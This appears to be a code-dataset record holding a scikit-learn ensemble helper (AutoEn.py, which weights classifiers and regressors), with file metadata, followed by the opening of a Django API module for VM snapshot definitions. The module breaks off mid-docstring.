| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
9ec4e8a15d0480accb64acdf16f67e7a2701ef39
| 28,269
|
py
|
Python
|
AutoEn.py
|
nileshchilka1/AutoEnsembler
|
4df8fe160bbfae16e9a9a401ef8a7c8a20ffc414
|
[
"MIT"
] | 3
|
2020-10-24T06:45:58.000Z
|
2021-11-05T10:42:56.000Z
|
AutoEn.py
|
nileshchilka1/AutoEnsembler
|
4df8fe160bbfae16e9a9a401ef8a7c8a20ffc414
|
[
"MIT"
] | null | null | null |
AutoEn.py
|
nileshchilka1/AutoEnsembler
|
4df8fe160bbfae16e9a9a401ef8a7c8a20ffc414
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn.model_selection import train_test_split,GridSearchCV,RandomizedSearchCV
from sklearn.metrics import accuracy_score,confusion_matrix
from sklearn.metrics import r2_score
import warnings
def findCombinationsUtil(arr, index, num, reducedNum,size,unique_classes):
global combinations
if (reducedNum < 0):
return;
if (reducedNum == 0):
comb = []
for i in range(index):
comb.append(arr[i]/10)
if len(comb) == size:
comb = zero_padding(comb,unique_classes)
combinations.append(comb)
return;
prev = 1 if(index == 0) else arr[index - 1];
for k in range(prev, num + 1):
arr[index] = k;
findCombinationsUtil(arr, index + 1, num, reducedNum - k,size,unique_classes);
def findCombinations(n,size,unique_classes):
arr = [0] * n;
findCombinationsUtil(arr, 0, n, n,size,unique_classes)
def zero_padding(lst,size):
l=len(lst)
for i in range(size-l):
lst.append(0)
return lst
combinations = []
def find_all_combinations(unique_classes):
global combinations
n = 10
for i in range(2,unique_classes+1):
findCombinations(n,i,unique_classes);
combinations += combinations
zeros = [0] * unique_classes
zeros[0] = 1
combinations.append(zeros)
from itertools import permutations
all_combinations = []
for comb in combinations:
perm = permutations(comb)
for i in list(perm):
if i not in all_combinations:
all_combinations.append(i)
return all_combinations
class AutoEnClassifier:
def __init__(self,LR=True,SVC=False,RF=True,AB=False,KNN=False,random_state=0,GridSearch=False,optimize=None,scoring='accuracy'):
self.__LR = LR
self.__SVC = SVC
self.__RF = RF
self.__AB = AB
self.__KNN = KNN
self.__random_state = random_state
self.__GridSearch = GridSearch
self.__optimize = optimize
if not GridSearch:
warnings.warn('model will use RandomizedSearch')
self.__scoring = scoring
def fit(self,X_train,y_train,validation_split=0.2,validation_data=False):
self.__storing_model_names = []
self.__X_train = X_train
self.__y_train = y_train
if validation_data:
self.__X_test = validation_data[0]
self.__y_test = validation_data[1]
else:
self.__X_train,self.__X_test,self.__y_train,self.__y_test = train_test_split(X_train,y_train,test_size=validation_split,random_state=self.__random_state)
if self.__LR:
AutoEnClassifier.LR_model_fit(self,param_grid=None)
self.__storing_model_names.append('LR_score')
if self.__SVC:
AutoEnClassifier.SVC_model_fit(self,param_grid=None)
self.__storing_model_names.append('SVC_score')
if self.__RF:
AutoEnClassifier.RF_model_fit(self,param_grid=None)
self.__storing_model_names.append('RF_score')
if self.__AB:
AutoEnClassifier.AB_model_fit(self,param_grid=None)
self.__storing_model_names.append('AB_score')
if self.__KNN:
AutoEnClassifier.KNN_model_fit(self,list_neighbors=None)
self.__storing_model_names.append('KNN_score')
AutoEnClassifier.find_best(self)
def LR_model_fit(self,param_grid=None):
from sklearn.linear_model import LogisticRegression
LR_model = LogisticRegression()
if param_grid == None:
parameters = {'C':[0.1,0.5,1,5,10],
'solver':['newton-cg', 'lbfgs', 'sag', 'saga'],
}
if self.__GridSearch:
self.__LR_model = GridSearchCV(estimator=LR_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LR_model = RandomizedSearchCV(estimator=LR_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__LR_model = GridSearchCV(estimator=LR_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LR_model = RandomizedSearchCV(estimator=LR_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__LR_model.fit(self.__X_train,self.__y_train)
print(f'LR_score : {accuracy_score(self.__LR_model.predict(self.__X_test),self.__y_test)}')
def SVC_model_fit(self,param_grid=None):
from sklearn.svm import SVC
SVC_model = SVC(probability=True)
if param_grid == None:
parameters = [{'kernel': ['rbf','poly'],
'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]}]
if self.__GridSearch:
self.__SVC_model = GridSearchCV(estimator=SVC_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVC_model = RandomizedSearchCV(estimator=SVC_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__SVC_model = GridSearchCV(estimator=SVC_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVC_model = RandomizedSearchCV(estimator=SVC_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__SVC_model.fit(self.__X_train,self.__y_train)
print(f'SVC_score : {accuracy_score(self.__SVC_model.predict(self.__X_test),self.__y_test)}')
def RF_model_fit(self,param_grid=None):
from sklearn.ensemble import RandomForestClassifier
RF_model = RandomForestClassifier()
if param_grid == None:
parameters = {'n_estimators' :[10,50,100,500],
'max_depth' : [4,8,10,12,16],
'min_samples_leaf' : [0.1, 0.2, 0.3, 0.4, 0.5]
}
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__RF_model.fit(self.__X_train,self.__y_train)
print(f'RF_score : {accuracy_score(self.__RF_model.predict(self.__X_test),self.__y_test)}')
def AB_model_fit(self,param_grid=None):
from sklearn.ensemble import AdaBoostClassifier
AB_model = AdaBoostClassifier()
if param_grid == None:
parameters = {'n_estimators' :[10,50,100,500],
'learning_rate' : [0.01,0.5,0.1,0.15,0.2],
}
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__AB_model.fit(self.__X_train,self.__y_train)
print(f'AB_score : {accuracy_score(self.__AB_model.predict(self.__X_test),self.__y_test)}')
def KNN_model_fit(self,list_neighbors=None):
from sklearn.neighbors import KNeighborsClassifier
if list_neighbors == None:
list_neighbors = [3,5,7,9,11,13,15]
n_neighbor_score_model = [None,0,None]
for neighbor in list_neighbors:
self.__KNN_model = KNeighborsClassifier(n_neighbors=neighbor)
self.__KNN_model = self.__KNN_model.fit(self.__X_train,self.__y_train)
model_score = self.__KNN_model.score(self.__X_test,self.__y_test)
if model_score > n_neighbor_score_model[1]:
n_neighbor_score_model[0] = neighbor
n_neighbor_score_model[1] = model_score
n_neighbor_score_model[2] = self.__KNN_model
self.__KNN_model = n_neighbor_score_model[2]
y_predict = self.__KNN_model.predict_proba(self.__X_test)
y_predict = np.argmax(y_predict,axis=1)
print(f'KNN_score with {n_neighbor_score_model[0]} neighbors: {accuracy_score(self.__y_test,y_predict)}')
def find_best(self):
global combinations
combinations = []
Total_models = self.__LR + self.__SVC + self.__RF + self.__KNN + self.__AB
optimize_count = None
combinations = find_all_combinations(Total_models)
combinations = np.array(combinations)
all_proba = []
count = 1
self.__best_score = [0] + [None] * Total_models
if self.__LR:
LR_model_y_predict_proba = self.__LR_model.predict_proba(self.__X_test)
all_proba.append(LR_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__SVC:
SVC_model_y_predict_proba = self.__SVC_model.predict_proba(self.__X_test)
all_proba.append(SVC_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__RF:
RF_model_y_predict_proba = self.__RF_model.predict_proba(self.__X_test)
all_proba.append(RF_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__AB:
AB_model_y_predict_proba = self.__AB_model.predict_proba(self.__X_test)
all_proba.append(AB_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__KNN:
KNN_model_y_predict_proba = self.__KNN_model.predict_proba(self.__X_test)
all_proba.append(KNN_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
all_proba = np.array(all_proba)
all_proba = np.sum(np.multiply(combinations.T ,np.array([all_proba]).T ).T,axis=1)
for proba,comb in zip(all_proba,combinations):
y_predict = np.argmax(proba,axis=1)
latest_score = accuracy_score(self.__y_test,y_predict)
if latest_score > self.__best_score[0]:
self.__best_score[0] = latest_score
for i in range(0,len(comb)):
self.__best_score[i+1] = comb[i]
if self.__optimize == 'FP':
optimize_count = confusion_matrix(self.__y_test,y_predict)[1][0]
elif self.__optimize == 'FN':
optimize_count = confusion_matrix(self.__y_test,y_predict)[0][1]
elif latest_score == self.__best_score[0] and self.__optimize == 'FP':
FP_count = confusion_matrix(self.__y_test,y_predict)[1][0]
if FP_count < optimize_count:
print(f'optimized FP from {optimize_count} to {FP_count}')
optimize_count = FP_count
self.__best_score[0] = latest_score
for i in range(0,len(comb)):
self.__best_score[i+1] = comb[i]
elif latest_score == self.__best_score[0] and self.__optimize == 'FN':
FN_count = confusion_matrix(self.__y_test,y_predict)[0][1]
if FN_count < optimize_count:
print(f'optimized FN from {optimize_count} to {FN_count}')
optimize_count = FN_count
self.__best_score[0] = latest_score
for i in range(0,len(comb)):
self.__best_score[i+1] = comb[i]
print(f'AutoEn_score : {self.__best_score[0]}')
for i in range(len(self.__storing_model_names)):
print(f'weight for {self.__storing_model_names[i]} : {self.__best_score[i+1]}')
def predict(self,X_test):
all_proba = []
count = 1
try:
if self.__LR:
LR_model_y_predict_proba = self.__LR_model.predict_proba(X_test)
LR_model_y_predict_proba = np.multiply(LR_model_y_predict_proba,self.__best_score[count])
all_proba.append(LR_model_y_predict_proba)
count+=1
if self.__SVC:
SVC_model_y_predict_proba = self.__SVC_model.predict_proba(X_test)
SVC_model_y_predict_proba = np.multiply(SVC_model_y_predict_proba,self.__best_score[count])
all_proba.append(SVC_model_y_predict_proba)
count+=1
if self.__RF:
RF_model_y_predict_proba = self.__RF_model.predict_proba(X_test)
RF_model_y_predict_proba = np.multiply(RF_model_y_predict_proba,self.__best_score[count])
all_proba.append(RF_model_y_predict_proba)
count+=1
if self.__AB:
AB_model_y_predict_proba = self.__AB_model.predict_proba(X_test)
AB_model_y_predict_proba = np.multiply(AB_model_y_predict_proba,self.__best_score[count])
all_proba.append(AB_model_y_predict_proba)
count+=1
if self.__KNN:
KNN_model_y_predict_proba = self.__KNN_model.predict_proba(X_test)
KNN_model_y_predict_proba = np.multiply(KNN_model_y_predict_proba,self.__best_score[count])
all_proba.append(KNN_model_y_predict_proba)
count+=1
y_predict = np.sum(all_proba,axis=0)
except AttributeError:
print('model not fitted yet')
return None
except:
print('something went wrong')
return None
y_predict = np.argmax(y_predict,axis=1)
return y_predict
class AutoEnRegressor:
def __init__(self,LA=True,SVR=False,RF=True,AB=False,KNN=False,random_state=0,GridSearch=False,scoring='r2'):
self.__LA = LA
self.__SVR = SVR
self.__RF = RF
self.__AB = AB
self.__KNN = KNN
self.__random_state = random_state
self.__GridSearch = GridSearch
if not GridSearch:
warnings.warn('model will use RandomizedSearch')
self.__scoring = scoring
def fit(self,X_train,y_train,validation_split=0.2,validation_data=False):
self.__storing_model_names = []
self.__X_train = X_train
self.__y_train = y_train
if validation_data:
self.__X_test = validation_data[0]
self.__y_test = validation_data[1]
else:
self.__X_train,self.__X_test,self.__y_train,self.__y_test = train_test_split(X_train,y_train,test_size=validation_split,random_state=self.__random_state)
if self.__LA:
AutoEnRegressor.LA_model_fit(self,param_grid=None)
self.__storing_model_names.append('LA_score')
if self.__SVR:
AutoEnRegressor.SVR_model_fit(self,param_grid=None)
self.__storing_model_names.append('SVR_score')
if self.__RF:
AutoEnRegressor.RF_model_fit(self,param_grid=None)
self.__storing_model_names.append('RF_score')
if self.__AB:
AutoEnRegressor.AB_model_fit(self,param_grid=None)
self.__storing_model_names.append('AB_score')
if self.__KNN:
AutoEnRegressor.KNN_model_fit(self,list_neighbors=None)
self.__storing_model_names.append('KNN_score')
AutoEnRegressor.find_best(self)
def LA_model_fit(self,param_grid=None):
from sklearn.linear_model import Lasso
LA_model = Lasso()
if param_grid == None:
parameters = {'alpha':[0.01,0.5,1,2,5]
}
if self.__GridSearch:
self.__LA_model = GridSearchCV(estimator=LA_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LA_model = RandomizedSearchCV(estimator=LA_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__LA_model = GridSearchCV(estimator=LA_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LA_model = RandomizedSearchCV(estimator=LA_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__LA_model.fit(self.__X_train,self.__y_train)
print(f'LA_score : {r2_score(self.__y_test,self.__LA_model.predict(self.__X_test))}')
def SVR_model_fit(self,param_grid=None):
from sklearn.svm import SVR
SVR_model = SVR()
if param_grid == None:
parameters = [{'kernel': ['rbf','poly'],
'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]}]
if self.__GridSearch:
self.__SVR_model = GridSearchCV(estimator=SVR_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVR_model = RandomizedSearchCV(estimator=SVR_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__SVR_model = GridSearchCV(estimator=SVR_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVR_model = RandomizedSearchCV(estimator=SVR_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__SVR_model.fit(self.__X_train,self.__y_train)
print(f'SVR_score : {r2_score(self.__y_test,self.__SVR_model.predict(self.__X_test))}')
def RF_model_fit(self,param_grid=None):
from sklearn.ensemble import RandomForestRegressor
RF_model = RandomForestRegressor()
if param_grid == None:
parameters = {'n_estimators' :[10,50,100,500],
'max_depth' : [4,8,10,12,16],
'min_samples_leaf' : [0.1, 0.2, 0.3, 0.4, 0.5]
}
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__RF_model.fit(self.__X_train,self.__y_train)
print(f'RF_score : {r2_score(self.__y_test,self.__RF_model.predict(self.__X_test))}')
def AB_model_fit(self,param_grid=None):
from sklearn.ensemble import AdaBoostRegressor
AB_model = AdaBoostRegressor()
if param_grid == None:
parameters = {'n_estimators' :[10,50,100,500],
'learning_rate' : [0.01,0.5,0.1,0.15,0.2],
}
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__AB_model.fit(self.__X_train,self.__y_train)
print(f'AB_score : {r2_score(self.__y_test,self.__AB_model.predict(self.__X_test))}')
def KNN_model_fit(self,list_neighbors=None):
from sklearn.neighbors import KNeighborsRegressor
if list_neighbors == None:
list_neighbors = [3,5,7,9,11,13,15]
n_neighbor_score_model = [None,0,None]
for neighbor in list_neighbors:
self.__KNN_model = KNeighborsRegressor(n_neighbors=neighbor)
self.__KNN_model = self.__KNN_model.fit(self.__X_train,self.__y_train)
model_score = self.__KNN_model.score(self.__X_test,self.__y_test)
if model_score > n_neighbor_score_model[1]:
n_neighbor_score_model[0] = neighbor
n_neighbor_score_model[1] = model_score
n_neighbor_score_model[2] = self.__KNN_model
self.__KNN_model = n_neighbor_score_model[2]
y_predict = self.__KNN_model.predict(self.__X_test)
print(f'KNN_score with {n_neighbor_score_model[0]} neighbors: {r2_score(self.__y_test,y_predict)}')
def find_best(self):
global combinations
combinations = []
Total_models = self.__LA + self.__SVR + self.__RF + self.__KNN + self.__AB
combinations = np.array(find_all_combinations(Total_models))
all_proba = []
count = 1
self.__best_score = [0] + [None] * Total_models
if self.__LA:
LA_model_y_predict_proba = self.__LA_model.predict(self.__X_test)
all_proba.append(LA_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__SVR:
SVR_model_y_predict_proba = self.__SVR_model.predict(self.__X_test)
all_proba.append(SVR_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__RF:
RF_model_y_predict_proba = self.__RF_model.predict(self.__X_test)
all_proba.append(RF_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__AB:
AB_model_y_predict_proba = self.__AB_model.predict(self.__X_test)
all_proba.append(AB_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
if self.__KNN:
KNN_model_y_predict_proba = self.__KNN_model.predict(self.__X_test)
all_proba.append(KNN_model_y_predict_proba)
if self.__best_score[count] == None:
count += 1
all_proba = np.array(all_proba)
all_proba = np.sum(np.multiply(combinations.T ,np.array([all_proba]).T ).T,axis=1)
for y_predict,comb in zip(all_proba,combinations):
latest_score = r2_score(self.__y_test,y_predict)
if latest_score > self.__best_score[0]:
self.__best_score[0] = latest_score
for i in range(0,len(comb)):
self.__best_score[i+1] = comb[i]
print(f'AutoEn_score : {self.__best_score[0]}')
for i in range(len(self.__storing_model_names)):
print(f'weight for {self.__storing_model_names[i]} : {self.__best_score[i+1]}')
def predict(self,X_test):
all_proba = []
count = 1
try:
if self.__LA:
LA_model_y_predict = self.__LA_model.predict(X_test)
LA_model_y_predict = np.multiply(LA_model_y_predict,self.__best_score[count])
all_proba.append(LA_model_y_predict)
count+=1
if self.__SVR:
SVR_model_y_predict = self.__SVR_model.predict(X_test)
SVR_model_y_predict = np.multiply(SVR_model_y_predict,self.__best_score[count])
all_proba.append(SVR_model_y_predict)
count+=1
if self.__RF:
RF_model_y_predict = self.__RF_model.predict(X_test)
RF_model_y_predict = np.multiply(RF_model_y_predict,self.__best_score[count])
all_proba.append(RF_model_y_predict)
count+=1
if self.__AB:
AB_model_y_predict = self.__AB_model.predict(X_test)
AB_model_y_predict = np.multiply(AB_model_y_predict,self.__best_score[count])
all_proba.append(AB_model_y_predict)
count+=1
if self.__KNN:
KNN_model_y_predict = self.__KNN_model.predict(X_test)
KNN_model_y_predict = np.multiply(KNN_model_y_predict,self.__best_score[count])
all_proba.append(KNN_model_y_predict)
count+=1
y_predict = np.sum(all_proba,axis=0)
except AttributeError:
print('model not fitted yet')
return None
except:
print('something went wrong')
return None
return y_predict
| 43.357362
| 165
| 0.56967
| 3,330
| 28,269
| 4.361261
| 0.054955
| 0.044068
| 0.053708
| 0.049577
| 0.83564
| 0.821662
| 0.789919
| 0.76823
| 0.754252
| 0.732769
| 0
| 0.018257
| 0.341222
| 28,269
| 651
| 166
| 43.423963
| 0.761585
| 0
| 0
| 0.600823
| 0
| 0
| 0.055162
| 0.029085
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045267
| false
| 0
| 0.032922
| 0
| 0.098765
| 0.041152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9ef4cd147d43d2ad1ef9d58b3b2a7ce4421f14c7
| 19,189
|
py
|
Python
|
api/vm/snapshot/views.py
|
klebed/esdc-ce
|
2c9e4591f344247d345a83880ba86777bb794460
|
[
"Apache-2.0"
] | 97
|
2016-11-15T14:44:23.000Z
|
2022-03-13T18:09:15.000Z
|
api/vm/snapshot/views.py
|
klebed/esdc-ce
|
2c9e4591f344247d345a83880ba86777bb794460
|
[
"Apache-2.0"
] | 334
|
2016-11-17T19:56:57.000Z
|
2022-03-18T10:45:53.000Z
|
api/vm/snapshot/views.py
|
klebed/esdc-ce
|
2c9e4591f344247d345a83880ba86777bb794460
|
[
"Apache-2.0"
] | 33
|
2017-01-02T16:04:13.000Z
|
2022-02-07T19:20:24.000Z
|
from vms.models import SnapshotDefine
from api.decorators import api_view, request_data, setting_required
from api.permissions import IsAdminOrReadOnly
from api.utils.db import get_object
from api.vm.utils import get_vm, get_vms
# noinspection PyProtectedMember
from api.image.base.views import image_snapshot
from api.vm.snapshot.utils import get_disk_id, filter_disk_id, output_extended_snap_count
from api.vm.snapshot.vm_define_snapshot import SnapshotDefineView
from api.vm.snapshot.vm_snapshot import VmSnapshot
from api.vm.snapshot.vm_snapshot_list import VmSnapshotList
__all__ = ('vm_define_snapshot_list_all', 'vm_define_snapshot_list', 'vm_define_snapshot', 'vm_snapshot_list',
'vm_snapshot', 'image_snapshot')
#: vm_status: GET:
@api_view(('GET',))
@request_data(permissions=(IsAdminOrReadOnly,)) # get_vms() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_define_snapshot_list_all(request, data=None):
"""
List (:http:get:`GET </vm/define/snapshot>`) all snapshot definitions for all VMs.
.. http:get:: /vm/define/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg data.full: Return list of objects with all snapshot definition details (default: false)
:type data.full: boolean
:arg data.extended: Include total number of snapshots for each snapshot definition (default: false)
:type data.extended: boolean
:arg data.order_by: :ref:`Available fields for sorting <order_by>`: ``name``, ``disk_id``, ``hostname``, \
``created`` (default: ``hostname,-created``)
:type data.order_by: string
:status 200: SUCCESS
:status 403: Forbidden
"""
extra = output_extended_snap_count(request, data)
# TODO: check indexes
snap_define = SnapshotDefine.objects.select_related('vm', 'periodic_task', 'periodic_task__crontab')\
.filter(vm__in=get_vms(request))\
.order_by(*SnapshotDefineView.get_order_by(data))
if extra:
snap_define = snap_define.extra(extra)
return SnapshotDefineView(request, data=data).get(None, snap_define, many=True, extended=bool(extra))
#: vm_status: GET:
@api_view(('GET',))
@request_data(permissions=(IsAdminOrReadOnly,)) # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_define_snapshot_list(request, hostname_or_uuid, data=None):
"""
List (:http:get:`GET </vm/(hostname_or_uuid)/define/snapshot>`) all VM snapshot definitions.
.. http:get:: /vm/(hostname_or_uuid)/define/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.full: Return list of objects with all snapshot definition details (default: false)
:type data.full: boolean
:arg data.disk_id: Filter by disk number/ID
:type data.disk_id: integer
:arg data.extended: Include total number of snapshots for each snapshot definition (default: false)
:type data.extended: boolean
:arg data.order_by: :ref:`Available fields for sorting <order_by>`: ``name``, ``disk_id``, ``created`` \
(default: ``-created``)
:type data.order_by: string
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid disk_id
"""
vm = get_vm(request, hostname_or_uuid, exists_ok=True, noexists_fail=True, sr=('node', 'owner'))
query_filter = {'vm': vm}
query_filter = filter_disk_id(vm, query_filter, data)
extra = output_extended_snap_count(request, data)
# TODO: check indexes
snap_define = SnapshotDefine.objects.select_related('vm', 'periodic_task', 'periodic_task__crontab')\
.filter(**query_filter).order_by(*SnapshotDefineView.get_order_by(data))
if extra:
snap_define = snap_define.extra(extra)
return SnapshotDefineView(request, data=data).get(vm, snap_define, many=True, extended=bool(extra))
#: vm_status: GET:
#: vm_status: POST: running, stopped, stopping
#: vm_status: PUT: running, stopped, stopping
#: vm_status:DELETE: running, stopped, stopping
@api_view(('GET', 'POST', 'PUT', 'DELETE'))
@request_data(permissions=(IsAdminOrReadOnly,)) # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_define_snapshot(request, hostname_or_uuid, snapdef, data=None):
"""
Show (:http:get:`GET </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`),
create (:http:post:`POST </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`),
remove (:http:delete:`DELETE </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`) or
update (:http:put:`PUT </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`)
a VM snapshot definition and schedule.
.. http:get:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.extended: Include total number of snapshots (default: false)
:type data.extended: boolean
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found / Snapshot definition not found
:status 412: Invalid disk_id
.. http:post:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |Admin|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name (predefined: hourly, daily, weekly, monthly)
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.schedule: **required** - Schedule in UTC CRON format (e.g. 30 4 * * 6)
:type data.schedule: string
:arg data.retention: **required** - Maximum number of snapshots to keep
:type data.retention: integer
:arg data.active: Enable or disable snapshot schedule (default: true)
:type data.active: boolean
:arg data.desc: Snapshot definition description
:type data.desc: string
:arg data.fsfreeze: Whether to send filesystem freeze command to QEMU agent socket before \
creating snapshot (requires QEMU Guest Agent) (default: false)
:type data.fsfreeze: boolean
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 406: Snapshot definition already exists
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
.. http:put:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |Admin|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.schedule: Schedule in UTC CRON format (e.g. 30 4 * * 6)
:type data.schedule: string
:arg data.retention: Maximum number of snapshots to keep
:type data.retention: integer
:arg data.active: Enable or disable snapshot schedule
:type data.active: boolean
:arg data.desc: Snapshot definition description
:type data.desc: string
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot definition not found
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
.. http:delete:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |Admin|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot definition not found
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
"""
vm = get_vm(request, hostname_or_uuid, exists_ok=True, noexists_fail=True)
disk_id, real_disk_id, zfs_filesystem = get_disk_id(request, vm, data)
extra = output_extended_snap_count(request, data)
define = get_object(request, SnapshotDefine, {'name': snapdef, 'vm': vm, 'disk_id': real_disk_id},
sr=('vm', 'periodic_task', 'periodic_task__crontab'), extra={'select': extra})
return SnapshotDefineView(request, data=data).response(vm, define, extended=bool(extra))
#: vm_status: GET:
#: vm_status: PUT: running, stopped, stopping
#: vm_status:DELETE: running, stopped, stopping
@api_view(('GET', 'PUT', 'DELETE'))
@request_data() # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_snapshot_list(request, hostname_or_uuid, data=None):
"""
List (:http:get:`GET </vm/(hostname_or_uuid)/snapshot>`) all VM snapshots or
